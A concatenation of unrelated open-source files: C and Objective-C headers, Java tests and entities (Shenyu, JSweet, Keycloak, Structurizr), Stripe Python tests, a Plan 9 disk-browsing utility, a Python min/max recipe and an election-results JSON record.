* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*//*!
* \file
* \brief Input stream abstraction.
*//*--------------------------------------------------------------------*/
#include "deDefs.h"
#include "deIOStream.h"
DE_BEGIN_EXTERN_C
/* Input stream struct, implemented as a wrapper to io stream */
typedef struct deInStream_s
{
	/* Underlying generic stream; only its read-side operations are exposed. */
	deIOStream ioStream;
} deInStream;
/* Inline wrappers, defined below, that forward to the deIOStream API. */
DE_INLINE deStreamResult deInStream_read (deInStream* stream, void* buf, deInt32 bufSize, deInt32* numWritten);
DE_INLINE deStreamResult deInStream_deinit (deInStream* stream);
DE_INLINE const char* deInStream_getError (deInStream* stream);
DE_INLINE deStreamStatus deInStream_getStatus(deInStream* stream);
/* Read up to bufSize bytes into buf; *numWritten receives the amount read. */
DE_INLINE deStreamResult deInStream_read (deInStream* stream, void* buf, deInt32 bufSize, deInt32* numWritten)
{
	deIOStream* io = &stream->ioStream;
	return deIOStream_read(io, buf, bufSize, numWritten);
}
/* Release the wrapped stream's resources. */
DE_INLINE deStreamResult deInStream_deinit (deInStream* stream)
{
	deIOStream* io = &stream->ioStream;
	return deIOStream_deinit(io);
}
/* Return the wrapped stream's last error message. */
DE_INLINE const char* deInStream_getError (deInStream* stream)
{
	deIOStream* io = &stream->ioStream;
	return deIOStream_getError(io);
}
/* Return the wrapped stream's current status. */
DE_INLINE deStreamStatus deInStream_getStatus(deInStream* stream)
{
	deIOStream* io = &stream->ioStream;
	return deIOStream_getStatus(io);
}
DE_END_EXTERN_C
#endif /* _DEINSTREAM_H */
| 631 |
1,592 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.shenyu.springboot.starter.plugin.sentinel;
import com.alibaba.csp.sentinel.adapter.spring.webflux.exception.SentinelBlockExceptionHandler;
import org.apache.shenyu.common.enums.PluginEnum;
import org.apache.shenyu.plugin.base.fallback.FallbackHandler;
import org.apache.shenyu.plugin.base.handler.PluginDataHandler;
import org.apache.shenyu.plugin.sentinel.SentinelPlugin;
import org.junit.Before;
import org.junit.Test;
import org.springframework.boot.autoconfigure.AutoConfigurations;
import org.springframework.boot.context.properties.EnableConfigurationProperties;
import org.springframework.boot.test.context.runner.ApplicationContextRunner;
import org.springframework.context.annotation.Configuration;
import org.springframework.http.codec.support.DefaultServerCodecConfigurer;
import static org.assertj.core.api.Assertions.assertThat;
import static org.junit.Assert.assertNotNull;
/**
* Test case for {@link SentinelPluginConfiguration}.
*/
@Configuration
@EnableConfigurationProperties
public class SentinelPluginConfigurationTest {
    private ApplicationContextRunner applicationContextRunner;
    /**
     * Builds a fresh context runner per test with the sentinel plugin
     * auto-configuration plus the extra beans its components require.
     */
    @Before
    public void before() {
        applicationContextRunner = new ApplicationContextRunner()
            .withConfiguration(AutoConfigurations.of(SentinelPluginConfiguration.class))
            .withBean(SentinelPluginConfigurationTest.class)
            .withBean(DefaultServerCodecConfigurer.class)
            .withPropertyValues("debug=true");
    }
    /** The sentinel plugin bean exists and reports the expected plugin name. */
    @Test
    public void testSentinelPlugin() {
        applicationContextRunner.run(context -> {
            SentinelPlugin plugin = context.getBean("sentinelPlugin", SentinelPlugin.class);
            assertNotNull(plugin);
            assertThat(plugin.named()).isEqualTo(PluginEnum.SENTINEL.getName());
        }
        );
    }
    /** The fallback handler bean is registered. */
    @Test
    public void testSentinelFallbackHandler() {
        applicationContextRunner.run(context -> {
            FallbackHandler handler = context.getBean("fallbackHandler", FallbackHandler.class);
            assertNotNull(handler);
        }
        );
    }
    /** The rule-data handler bean is registered. */
    @Test
    public void testSentinelRuleHandle() {
        applicationContextRunner.run(context -> {
            PluginDataHandler handler = context.getBean("sentinelRuleHandle", PluginDataHandler.class);
            assertNotNull(handler);
        }
        );
    }
    /** The block-exception handler bean is registered. */
    @Test
    public void testSentinelBlockExceptionHandler() {
        applicationContextRunner.run(context -> {
            SentinelBlockExceptionHandler handler = context.getBean("sentinelBlockExceptionHandler", SentinelBlockExceptionHandler.class);
            assertNotNull(handler);
        }
        );
    }
}
| 1,185 |
1,374 | <gh_stars>1000+
/*
* TypeScript definitions to Java translator - http://www.jsweet.org
* Copyright (C) 2015 CINCHEO SAS <<EMAIL>>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
package org.jsweet.input.typescriptdef.visitor;
import static org.jsweet.input.typescriptdef.util.Util.getOrCreateGlobalsType;
import org.apache.commons.lang3.StringUtils;
import org.jsweet.input.typescriptdef.ast.Context;
import org.jsweet.input.typescriptdef.ast.Declaration;
import org.jsweet.input.typescriptdef.ast.DeclarationHelper;
import org.jsweet.input.typescriptdef.ast.FunctionDeclaration;
import org.jsweet.input.typescriptdef.ast.ModuleDeclaration;
import org.jsweet.input.typescriptdef.ast.Scanner;
import org.jsweet.input.typescriptdef.ast.Type;
import org.jsweet.input.typescriptdef.ast.TypeDeclaration;
import org.jsweet.input.typescriptdef.ast.VariableDeclaration;
/**
* Puts all global members in Globals types.
*
* @author <NAME>
*/
public class GlobalsCreator extends Scanner {
	public GlobalsCreator(Context context) {
		super(context);
	}
	/**
	 * Moves each module-level variable and function into the module's
	 * "Globals" type and marks it static.
	 * NOTE(review): members are removed from moduleDeclaration while
	 * iterating getMembers(); this is only safe if getMembers() returns a
	 * snapshot/copy - confirm before refactoring.
	 */
	@Override
	public void visitModuleDeclaration(ModuleDeclaration moduleDeclaration) {
		for (Declaration declaration : moduleDeclaration.getMembers()) {
			if (declaration.isHidden()) {
				continue;
			}
			if ((declaration instanceof VariableDeclaration) || (declaration instanceof FunctionDeclaration)) {
				TypeDeclaration globalsClass = getOrCreateGlobalsType(context, moduleDeclaration,
						getParent(ModuleDeclaration.class));
				// names colliding with JS object method names (per DeclarationHelper)
				// are capitalized to avoid clashes on the Globals type
				if (DeclarationHelper.JS_OBJECT_METHOD_NAMES.contains(declaration.getName())) {
					declaration.setName(StringUtils.capitalize(declaration.getName()));
				}
				moduleDeclaration.removeMember(declaration);
				if (declaration instanceof VariableDeclaration) {
					// keep the first visible variable of a given name; warn on duplicates
					VariableDeclaration existing = globalsClass.findVariable(declaration.getName());
					if (existing != null && !existing.isHidden()) {
						context.reportWarning("skip variable " + declaration + " - already exists in "
								+ moduleDeclaration + " (" + existing + ")");
						// variable already exists
						continue;
					}
				}
				globalsClass.addMember(declaration);
				declaration.addModifier("static");
				if (declaration instanceof VariableDeclaration) {
					VariableDeclaration varDecl = (VariableDeclaration) declaration;
					Type t = lookupType(varDecl.getType(), null);
					if (t instanceof TypeDeclaration) {
						final TypeDeclaration typeDeclaration = (TypeDeclaration) t;
						// variables typed by a non-external static type are dropped again
						if (!typeDeclaration.isExternal() && typeDeclaration.isStatic()) {
							globalsClass.removeMember(declaration);
						}
					}
				}
			}
		}
		super.visitModuleDeclaration(moduleDeclaration);
	}
	// The following visits are intentionally no-ops: only module-level members
	// are relocated here; nested declarations are left untouched.
	@Override
	public void visitTypeDeclaration(TypeDeclaration typeDeclaration) {
	}
	@Override
	public void visitFunctionDeclaration(FunctionDeclaration functionDeclaration) {
	}
	@Override
	public void visitVariableDeclaration(VariableDeclaration variableDeclaration) {
	}
}
| 1,158 |
2,151 | // Copyright 2017 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef CHROME_SERVICES_FILE_UTIL_ZIP_FILE_CREATOR_H_
#define CHROME_SERVICES_FILE_UTIL_ZIP_FILE_CREATOR_H_
#include <vector>
#include "chrome/services/file_util/public/mojom/zip_file_creator.mojom.h"
#include "components/services/filesystem/public/interfaces/directory.mojom.h"
#include "services/service_manager/public/cpp/service_context_ref.h"
namespace base {
class FilePath;
}
namespace chrome {
// Utility-process implementation of chrome::mojom::ZipFileCreator: zips a set
// of files from a source directory into an already-opened zip file.
class ZipFileCreator : public chrome::mojom::ZipFileCreator {
 public:
  // |service_ref| presumably keeps the hosting service alive while this
  // instance exists - confirm against the service manager usage.
  explicit ZipFileCreator(
      std::unique_ptr<service_manager::ServiceContextRef> service_ref);
  ~ZipFileCreator() override;
 private:
  // chrome::mojom::ZipFileCreator:
  // Zips |source_relative_paths| (relative to |source_dir|) into |zip_file|
  // and reports the result through |callback|.
  void CreateZipFile(filesystem::mojom::DirectoryPtr source_dir_mojo,
                     const base::FilePath& source_dir,
                     const std::vector<base::FilePath>& source_relative_paths,
                     base::File zip_file,
                     CreateZipFileCallback callback) override;
  const std::unique_ptr<service_manager::ServiceContextRef> service_ref_;
  DISALLOW_COPY_AND_ASSIGN(ZipFileCreator);
};
} // namespace chrome
#endif // CHROME_SERVICES_FILE_UTIL_ZIP_FILE_CREATOR_H_
| 509 |
348 | {"nom":"Escalles","circ":"7ème circonscription","dpt":"Pas-de-Calais","inscrits":198,"abs":86,"votants":112,"blancs":1,"nuls":5,"exp":106,"res":[{"nuance":"LR","nom":"<NAME>","voix":85},{"nuance":"FN","nom":"<NAME>","voix":21}]} | 94 |
1,078 | from __future__ import absolute_import, division, print_function
import stripe
TEST_RESOURCE_ID = "si_123"
class TestSubscriptionItem(object):
    """CRUD tests for ``stripe.SubscriptionItem``.

    ``request_mock`` is a fixture that records outgoing API calls so each
    test can assert the HTTP verb, URL and payload that were sent.
    """
    def test_is_listable(self, request_mock):
        """Listing requires the parent subscription id in the query."""
        resources = stripe.SubscriptionItem.list(subscription="sub_123")
        request_mock.assert_requested(
            "get", "/v1/subscription_items", {"subscription": "sub_123"}
        )
        assert isinstance(resources.data, list)
        assert isinstance(resources.data[0], stripe.SubscriptionItem)
    def test_is_retrievable(self, request_mock):
        """Retrieve issues GET on the item's canonical URL."""
        resource = stripe.SubscriptionItem.retrieve(TEST_RESOURCE_ID)
        request_mock.assert_requested(
            "get", "/v1/subscription_items/%s" % TEST_RESOURCE_ID
        )
        assert isinstance(resource, stripe.SubscriptionItem)
    def test_is_creatable(self, request_mock):
        """Create POSTs price and subscription to the collection URL."""
        resource = stripe.SubscriptionItem.create(
            price="price_123", subscription="sub_123"
        )
        request_mock.assert_requested("post", "/v1/subscription_items")
        assert isinstance(resource, stripe.SubscriptionItem)
    def test_is_saveable(self, request_mock):
        """save() POSTs only the modified fields to the item URL."""
        resource = stripe.SubscriptionItem.retrieve(TEST_RESOURCE_ID)
        resource.price = "price_123"
        resource.save()
        request_mock.assert_requested(
            "post",
            "/v1/subscription_items/%s" % TEST_RESOURCE_ID,
            {"price": "price_123"},
        )
    def test_is_modifiable(self, request_mock):
        """modify() updates by id without a prior retrieve."""
        resource = stripe.SubscriptionItem.modify(
            TEST_RESOURCE_ID, price="price_123"
        )
        request_mock.assert_requested(
            "post",
            "/v1/subscription_items/%s" % TEST_RESOURCE_ID,
            {"price": "price_123"},
        )
        assert isinstance(resource, stripe.SubscriptionItem)
    def test_is_deletable(self, request_mock):
        """Instance delete() issues DELETE and flags the resource deleted."""
        resource = stripe.SubscriptionItem.retrieve(TEST_RESOURCE_ID)
        resource.delete()
        request_mock.assert_requested(
            "delete", "/v1/subscription_items/%s" % TEST_RESOURCE_ID
        )
        assert resource.deleted is True
    def test_can_delete(self, request_mock):
        """Class-level delete() works directly from the id."""
        resource = stripe.SubscriptionItem.delete(TEST_RESOURCE_ID)
        request_mock.assert_requested(
            "delete", "/v1/subscription_items/%s" % TEST_RESOURCE_ID
        )
        assert resource.deleted is True
class TestUsageRecords(object):
    """Tests for creating usage records on a subscription item."""
    def test_is_creatable(self, request_mock):
        """create_usage_record POSTs to the item's usage_records sub-resource."""
        resource = stripe.SubscriptionItem.create_usage_record(
            TEST_RESOURCE_ID,
            quantity=5000,
            timestamp=1524182400,
            action="increment",
        )
        request_mock.assert_requested(
            "post",
            "/v1/subscription_items/%s/usage_records" % TEST_RESOURCE_ID,
        )
        assert isinstance(resource, stripe.UsageRecord)
class TestUsageRecordSummaries(object):
    """Tests for listing usage record summaries of a subscription item."""
    def test_is_listable(self, request_mock):
        """list_usage_record_summaries GETs the usage_record_summaries sub-resource."""
        resource = stripe.SubscriptionItem.list_usage_record_summaries(
            TEST_RESOURCE_ID
        )
        request_mock.assert_requested(
            "get",
            "/v1/subscription_items/%s/usage_record_summaries"
            % TEST_RESOURCE_ID,
        )
        assert isinstance(resource.data, list)
        assert isinstance(resource.data[0], stripe.UsageRecordSummary)
| 1,498 |
1,391 | <reponame>newluhux/plan9port<filename>src/cmd/vbackup/diskftp.c<gh_stars>1000+
#include <u.h>
#include <libc.h>
#include <thread.h>
#include <sunrpc.h>
#include <nfs3.h>
#include <diskfs.h>
int debug;
/*
 * Print usage and exit. The commands operate on a path inside the
 * file-system partition named by the first argument.
 */
void
usage(void)
{
	/* Fixed: the message said "fsview", but this program is diskftp. */
	fprint(2, "usage: diskftp fspartition cmd\n");
	fprint(2, "cmd is:\n");
	fprint(2, "\tcat file\n");
	fprint(2, "\tls dir\n");
	fprint(2, "\tstat file\n");
	threadexitsall("usage");
}
/*
 * Pretty-print NFS attributes to stderr via the Nfs3Attr formatter.
 */
void
printattr(Nfs3Attr *attr)
{
	Fmt fmt;
	char buf[256];
	/* fmtfdinit buffers formatted output and flushes it to fd 2 */
	fmtfdinit(&fmt, 2, buf, sizeof buf);
	nfs3attrprint(&fmt, attr);
	fmtfdflush(&fmt);
	fprint(2, "\n");
}
char buf[8192];
/* Abort the program with the NFS error string unless the call succeeded. */
void
x(int ok)
{
	if(ok == Nfs3Ok)
		return;
	nfs3errstr(ok);
	sysfatal("%r");
}
/*
 * Entry point: open the file-system partition argv[0], walk the path
 * argv[2] from the root, and run command argv[1] ("cat", "ls" or "stat").
 * Attributes of the target are always printed to stderr first.
 */
void
threadmain(int argc, char **argv)
{
	char *p, *q;
	u32int n;
	Disk *disk;
	Fsys *fsys;
	Nfs3Handle h;
	SunAuthUnix au;
	Nfs3Attr attr;
	u64int offset;
	u1int eof;
	uchar *data;
	char *link;
	ARGBEGIN{
	case 'd':
		debug = 1;
		break;
	default:
		usage();
	}ARGEND
	if(argc != 3)
		usage();
	/* open the partition and layer a cache of 16 blocks of 16384 bytes over it */
	if((disk = diskopenfile(argv[0])) == nil)
		sysfatal("diskopen: %r");
	if((disk = diskcache(disk, 16384, 16)) == nil)
		sysfatal("diskcache: %r");
	if((fsys = fsysopen(disk)) == nil)
		sysfatal("fsysopen: %r");
	/* bypass permission checks and use an empty (anonymous) auth record */
	allowall = 1;
	memset(&au, 0, sizeof au);
	/* walk: resolve argv[2] one path component at a time from the root handle */
	if(debug) fprint(2, "get root...");
	x(fsysroot(fsys, &h));
	p = argv[2];
	while(*p){
		while(*p == '/')
			p++;
		if(*p == 0)
			break;
		q = strchr(p, '/');
		if(q){
			*q = 0;
			q++;
		}else
			q = "";
		if(debug) fprint(2, "walk %s...", p);
		x(fsyslookup(fsys, &au, &h, p, &h));
		p = q;
	}
	if(debug) fprint(2, "getattr...");
	x(fsysgetattr(fsys, &au, &h, &attr));
	printattr(&attr);
	/* do the op */
	if(strcmp(argv[1], "cat") == 0){
		switch(attr.type){
		case Nfs3FileReg:
		case Nfs3FileDir:
			/* stream the contents to stdout in sizeof(buf)-sized reads */
			offset = 0;
			for(;;){
				x(fsysreadfile(fsys, &au, &h, sizeof buf, offset, &data, &n, &eof));
				if(n){
					write(1, data, n);
					free(data);
					offset += n;
				}
				if(eof)
					break;
			}
			break;
		case Nfs3FileSymlink:
			/* symlinks: print the target instead of following it */
			x(fsysreadlink(fsys, &au, &h, &link));
			print("%s\n", link);
			break;
		default:
			print("cannot cat: not file, not link\n");
			break;
		}
	}else if(strcmp(argv[1], "ls") == 0){
		/* not implemented */
	}else if(strcmp(argv[1], "stat") == 0){
		/* already done: attributes were printed above */
	}
	threadexitsall(nil);
}
| 1,167 |
9,472 | <gh_stars>1000+
#pragma once
#include <stdbool.h>
#include <Python.h>
#ifdef PIPELINE_PAIR
/*
 * Pair mode: an entry couples a request with either a real task object or
 * an already-available response stored in the task slot; is_task says which.
 */
typedef struct {
    bool is_task;
    PyObject* request;
    PyObject* task;
} PipelineEntry;
/* True when the entry wraps an actual task rather than an inline response. */
static inline bool
PipelineEntry_is_task(PipelineEntry entry)
{
    return entry.is_task;
}
/* Release the entry's owned references. */
static inline void
PipelineEntry_DECREF(PipelineEntry entry)
{
    Py_DECREF(entry.request);
    // if not real task this was response,
    // that was inside request that was already freed above
    if(entry.is_task)
        Py_XDECREF(entry.task);
}
/* Acquire references for both members (the task slot may be NULL). */
static inline void
PipelineEntry_INCREF(PipelineEntry entry)
{
    Py_INCREF(entry.request);
    Py_XINCREF(entry.task);
}
/* Accessor for the task (or stored response) object. */
static inline PyObject*
PipelineEntry_get_task(PipelineEntry entry)
{
    return entry.task;
}
#else
/*
 * Plain mode: an entry is just the task object itself, so the helpers
 * reduce to reference-count operations on a single PyObject.
 */
typedef PyObject* PipelineEntry;
static inline bool
PipelineEntry_is_task(PipelineEntry entry)
{
    return true;
}
static inline void
PipelineEntry_DECREF(PipelineEntry entry)
{
    Py_DECREF(entry);
}
static inline void
PipelineEntry_INCREF(PipelineEntry entry)
{
    Py_INCREF(entry);
}
static inline PyObject*
PipelineEntry_get_task(PipelineEntry entry)
{
    return entry;
}
#endif
/*
 * Pipeline object: a fixed-capacity (10-entry) FIFO of in-flight entries
 * tracked by start/end indices.
 * NOTE(review): index advance/wraparound semantics live in the matching .c
 * file and are not visible here - confirm before relying on them.
 */
typedef struct {
    PyObject_HEAD
#ifdef PIPELINE_OPAQUE
    /* Opaque mode: readiness callback is a Python callable. */
    PyObject* ready;
#else
    /* Embedded mode: readiness callback is a C function plus its protocol. */
    void* (*ready)(PipelineEntry, PyObject*);
    PyObject* protocol;
#endif
    PyObject* task_done;
    PipelineEntry queue[10];
    size_t queue_start;
    size_t queue_end;
} Pipeline;
/* True when no entries are queued (start and end indices coincide). */
#define PIPELINE_EMPTY(p) ((p)->queue_start == (p)->queue_end)
#ifndef PIPELINE_OPAQUE
/* C API prototypes (hidden when PIPELINE_OPAQUE is defined). */
PyObject*
Pipeline_new(Pipeline* self);
void
Pipeline_dealloc(Pipeline* self);
int
Pipeline_init(Pipeline* self, void* (*ready)(PipelineEntry, PyObject*), PyObject* protocol);
PyObject*
Pipeline_queue(Pipeline* self, PipelineEntry entry);
void*
Pipeline_cancel(Pipeline* self);
void*
cpipeline_init(void);
#endif
| 707 |
728 | package org.sirix.node.interfaces.immutable;
/**
* Immutable value node (for instance text-, attribute-node...).
*
* @author <NAME>
*
*/
public interface ImmutableValueNode {
  /**
   * Return a byte array representation of the node value.
   *
   * @return the value of the node as raw bytes (the encoding is determined
   *         by the implementation, not specified by this interface)
   */
  byte[] getRawValue();
  /**
   * Return the string value of the node.
   *
   * @return the string value of the node
   */
  String getValue();
}
| 146 |
12,252 | /*
* Copyright 2016 Red Hat, Inc. and/or its affiliates
* and other contributors as indicated by the @author tags.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.keycloak.models.jpa.entities;
import org.hibernate.annotations.Nationalized;

import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.FetchType;
import javax.persistence.Id;
import javax.persistence.IdClass;
import javax.persistence.JoinColumn;
import javax.persistence.ManyToOne;
import javax.persistence.NamedQueries;
import javax.persistence.NamedQuery;
import javax.persistence.Table;

import java.io.Serializable;
import java.util.Objects;
/**
* @author <a href="mailto:<EMAIL>"><NAME></a>
* @version $Revision: 1 $
*/
@NamedQueries({
        @NamedQuery(name="deleteRealmAttributesByRealm", query="delete from RealmAttributeEntity attr where attr.realm = :realm")
})
@Table(name="REALM_ATTRIBUTE")
@Entity
@IdClass(RealmAttributeEntity.Key.class)
public class RealmAttributeEntity {
    /** Owning realm; part of the composite primary key. */
    @Id
    @ManyToOne(fetch= FetchType.LAZY)
    @JoinColumn(name = "REALM_ID")
    protected RealmEntity realm;
    /** Attribute name; part of the composite primary key. */
    @Id
    @Column(name = "NAME")
    protected String name;
    /** Attribute value; nationalized to support non-ASCII content. */
    @Nationalized
    @Column(name = "VALUE")
    protected String value;
    public String getName() {
        return name;
    }
    public void setName(String name) {
        this.name = name;
    }
    public String getValue() {
        return value;
    }
    public void setValue(String value) {
        this.value = value;
    }
    public RealmEntity getRealm() {
        return realm;
    }
    public void setRealm(RealmEntity realm) {
        this.realm = realm;
    }
    /**
     * Null-safe accessor for a realm's id. Entities are compared by realm id
     * rather than object identity (lazy proxies may not be the same object).
     */
    private static String realmIdOf(RealmEntity realm) {
        return realm == null ? null : realm.getId();
    }
    /** Composite primary-key class: (realm, name). */
    public static class Key implements Serializable {
        protected RealmEntity realm;
        protected String name;
        public Key() {
        }
        public Key(RealmEntity user, String name) {
            this.realm = user;
            this.name = name;
        }
        public RealmEntity getRealm() {
            return realm;
        }
        public String getName() {
            return name;
        }
        @Override
        public boolean equals(Object o) {
            if (this == o) return true;
            if (o == null || getClass() != o.getClass()) return false;
            Key key = (Key) o;
            // Simplified from the original nested null checks; additionally
            // avoids an NPE when a non-null realm has a null id.
            return Objects.equals(name, key.name)
                    && Objects.equals(realmIdOf(realm), realmIdOf(key.realm));
        }
        @Override
        public int hashCode() {
            // Same values as the original 31-based formula for non-null ids.
            int result = Objects.hashCode(realmIdOf(realm));
            result = 31 * result + Objects.hashCode(name);
            return result;
        }
    }
    @Override
    public boolean equals(Object o) {
        if (this == o) return true;
        // instanceof also rejects null, matching the original null check.
        if (!(o instanceof RealmAttributeEntity)) return false;
        RealmAttributeEntity that = (RealmAttributeEntity) o;
        return Objects.equals(name, that.name)
                && Objects.equals(realmIdOf(realm), realmIdOf(that.realm));
    }
    @Override
    public int hashCode() {
        // Same values as the original 31-based formula for non-null ids.
        int result = Objects.hashCode(realmIdOf(realm));
        result = 31 * result + Objects.hashCode(name);
        return result;
    }
}
| 1,563 |
504 | <reponame>smmccabe/dsl
package com.structurizr.dsl;
import com.structurizr.model.Enterprise;
import com.structurizr.model.Location;
import com.structurizr.model.Person;
import com.structurizr.model.SoftwareSystem;
import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.assertEquals;
class ModelDslContextTests extends AbstractTests {
@Test
void end_DoesNothing_WhenNoPeopleAreMarkedAsInternal() {
ModelDslContext context = new ModelDslContext();
context.setWorkspace(workspace);
Person user1 = workspace.getModel().addPerson("Name 1");
Person user2 = workspace.getModel().addPerson("Name 2");
assertEquals(Location.Unspecified, user1.getLocation());
assertEquals(Location.Unspecified, user2.getLocation());
context.end();
assertEquals(Location.Unspecified, user1.getLocation());
assertEquals(Location.Unspecified, user2.getLocation());
}
@Test
void end_MarksAllOtherPeopleAsExternal_WhenSomePeopleAreMarkedAsInternal() {
ModelDslContext context = new ModelDslContext();
context.setWorkspace(workspace);
workspace.getModel().setEnterprise(new Enterprise("Name"));
Person user1 = workspace.getModel().addPerson("Name 1");
Person user2 = workspace.getModel().addPerson("Name 2");
user2.setLocation(Location.Internal);
assertEquals(Location.Unspecified, user1.getLocation());
assertEquals(Location.Internal, user2.getLocation());
context.end();
assertEquals(Location.External, user1.getLocation());
assertEquals(Location.Internal, user2.getLocation());
}
@Test
void end_DoesNothing_WhenNoSoftwareSystemsAreMarkedAsInternal() {
ModelDslContext context = new ModelDslContext();
context.setWorkspace(workspace);
SoftwareSystem softwareSystem1 = workspace.getModel().addSoftwareSystem("Name 1");
SoftwareSystem softwareSystem2 = workspace.getModel().addSoftwareSystem("Name 2");
assertEquals(Location.Unspecified, softwareSystem1.getLocation());
assertEquals(Location.Unspecified, softwareSystem2.getLocation());
context.end();
assertEquals(Location.Unspecified, softwareSystem1.getLocation());
assertEquals(Location.Unspecified, softwareSystem2.getLocation());
}
@Test
void end_MarksAllOtherSoftwareSystemsAsExternal_WhenSomeSoftwareSystemsAreMarkedAsInternal() {
ModelDslContext context = new ModelDslContext();
context.setWorkspace(workspace);
workspace.getModel().setEnterprise(new Enterprise("Name"));
SoftwareSystem softwareSystem1 = workspace.getModel().addSoftwareSystem("Name 1");
SoftwareSystem softwareSystem2 = workspace.getModel().addSoftwareSystem("Name 2");
softwareSystem1.setLocation(Location.Internal);
assertEquals(Location.Internal, softwareSystem1.getLocation());
assertEquals(Location.Unspecified, softwareSystem2.getLocation());
context.end();
assertEquals(Location.Internal, softwareSystem1.getLocation());
assertEquals(Location.External, softwareSystem2.getLocation());
}
} | 1,117 |
2,023 | <filename>recipes/Python/415233_Getting_minmax_sequence_greaterless_thsome/recipe-415233.py
def min_gt(seq, val):
    """
    Return smallest item in seq for which item > val applies.

    None is returned if seq was empty or all items in seq were <= val.
    Works for any iterable, in any order (the previous linear scan returned
    the *first* item > val, which was only the smallest for sorted input).

    >>> min_gt([1, 3, 6, 7], 4)
    6
    >>> min_gt([2, 4, 7, 11], 5)
    7
    """
    # min() with a generator visits each item once; default handles "no match".
    return min((v for v in seq if v > val), default=None)
def min_ge(seq, val):
    """
    Same as min_gt() except items equal to val are accepted as well.

    None is returned if seq was empty or all items in seq were < val.
    Works for any iterable, in any order.

    >>> min_ge([1, 3, 6, 7], 6)
    6
    >>> min_ge([2, 3, 4, 8], 8)
    8
    """
    return min((v for v in seq if v >= val), default=None)
def max_lt(seq, val):
    """
    Return greatest item in seq for which item < val applies.

    None is returned if seq was empty or all items in seq were >= val.
    Works for any iterable, in any order (the previous reverse index scan
    returned the *last* item < val, which was only the greatest for sorted
    sequences, and required an indexable sequence).

    >>> max_lt([3, 6, 7, 11], 10)
    7
    >>> max_lt((5, 9, 12, 13), 12)
    9
    """
    return max((v for v in seq if v < val), default=None)
def max_le(seq, val):
    """
    Same as max_lt(), but items in seq equal to val apply as well.

    None is returned if seq was empty or all items in seq were > val.
    Works for any iterable, in any order.

    >>> max_le([2, 3, 7, 11], 10)
    7
    >>> max_le((1, 3, 6, 11), 6)
    6
    """
    return max((v for v in seq if v <= val), default=None)
| 655 |
#ifndef StrokeManager_h
#define StrokeManager_h

#import <UIKit/UIKit.h>

#import "RecognizedInk.h"

NS_ASSUME_NONNULL_BEGIN

/**
 * Protocol used by the `StrokeManager` to send requests back to the `ViewController` to update the
 * display.
 */
@protocol StrokeManagerDelegate <NSObject>

/** Clears any temporary ink managed by the caller. */
- (void)clearInk;

/** Redraws the ink and recognition results. */
- (void)redraw;

/** Display the given message to the user. */
- (void)displayMessage:(NSString *)message;

@end

/**
 * The `StrokeManager` object is responsible for storing the ink and recognition results, and
 * managing the interaction with the recognizer. It receives the touch points as the user is drawing
 * from the `ViewController` (which takes care of rendering the ink), and stores them into an array
 * of `Stroke`s. When the user taps "recognize", the strokes are collected together into an `Ink`
 * object, and passed to the recognizer. The `StrokeManagerDelegate` protocol is used to inform the
 * `ViewController` when the display needs to be updated.
 *
 * The `StrokeManager` provides additional methods to handle other buttons in the UI, including
 * selecting a recognition language, downloading or deleting the recognition model, or clearing the
 * ink.
 */
@interface StrokeManager : NSObject

/**
 * Array of `RecognizedInk`s that have been sent to the recognizer along with any recognition
 * results.
 */
@property(readonly, nonatomic) NSArray<RecognizedInk *> *recognizedInks;

/**
 * Initializes internal state and stores a pointer to the view to allow for redrawing when ink is
 * sent to the recognizer or recognition results come back.
 */
- (nullable instancetype)initWithDelegate:(nullable id<StrokeManagerDelegate>)delegate
    NS_DESIGNATED_INITIALIZER;
- (nullable instancetype)init NS_UNAVAILABLE;

/** Function called by the `ViewController` to create the first point of a stroke. */
- (void)startStrokeAtPoint:(CGPoint)point time:(NSTimeInterval)t;

/** Function called by the `ViewController` to add a point to a stroke. */
- (void)continueStrokeAtPoint:(CGPoint)point time:(NSTimeInterval)t;

/** Function called by the `ViewController` to end a stroke. */
- (void)endStrokeAtPoint:(CGPoint)point time:(NSTimeInterval)t;

/** Clears all ink. */
- (void)clear;

/** Informs the `StrokeManager` of which recognizer to use for subsequent recognitions. */
- (void)selectLanguage:(NSString *)languageTag;

/**
 * Asks the `StrokeManager` to start downloading the recognition model indicated by
 * `selectLanguage:`.
 */
- (void)downloadModel;

/**
 * Check whether the model for the given language tag is already downloaded.
 */
- (BOOL)isLanguageDownloaded:(NSString *)languageTag;

/** Asks the `StrokeManager` to delete the recognition model indicated by `selectLanguage:`. */
- (void)deleteModel;

/**
 * Asks the `StrokeManager` to recognize the unrecognized ink using the recognition model indicated
 * by `selectLanguage:`.
 */
- (void)recognizeInk;

@end

